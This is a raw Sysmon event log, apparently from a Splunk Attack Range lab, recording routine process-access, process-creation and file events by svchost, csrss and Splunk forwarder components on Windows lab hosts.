07:59:25.015{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808835Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:25.015{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808834Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:25.015{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808833Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:25.015{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808832Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:25.015{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808831Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:25.015{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808830Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:25.015{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808829Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:25.015{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F65D-60EB-A579-00000000D001}3028C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000808828Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:25.015{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F65D-60EB-A579-00000000D001}3028C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000808827Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:25.000{0C1E0330-F65D-60EB-A579-00000000D001}3028C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000808872Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:26.874{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=53B21CDF86BAF1930A422EE1EC2EB73D,SHA256=92094C469C91C49D999490A4089B65B6B4A8DE80FCAC248AE8A9046F24BDEAC6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051867Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:26.075{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A39A293850A8094C1FB88F163A8E1BC8,SHA256=98603BA0DE06EC7C1F5570F839A63AEE992799362346642CA150C4B0EC5E25F3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808871Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:26.811{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AF2C193B54D23136B2175C63B854107B,SHA256=1789E6722C019973E89EF0C8DF785AE4458F4A804975ACD284908DE837F55C42,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000808870Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:26.327{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F65E-60EB-A779-00000000D001}2840C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808869Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:26.327{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808868Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:26.327{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808867Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:26.327{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808866Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:26.327{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808865Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:26.327{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808864Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:26.327{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808863Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:26.327{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808862Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:26.327{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808861Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:26.327{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808860Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:26.327{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F65E-60EB-A779-00000000D001}2840C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000808859Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:26.327{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F65E-60EB-A779-00000000D001}2840C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000808858Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:26.312{0C1E0330-F65E-60EB-A779-00000000D001}2840C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001051868Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:27.077{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=149BE6F19FCE1285D473D037E172FB8E,SHA256=A69271DF7B5BC214A643A6540C1193D587E99FC2A08795D1F774DC87240DDAC7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000808900Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:27.827{0C1E0330-F65F-60EB-A979-00000000D001}2372292C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808899Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:27.686{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F65F-60EB-A979-00000000D001}2372C:\Program 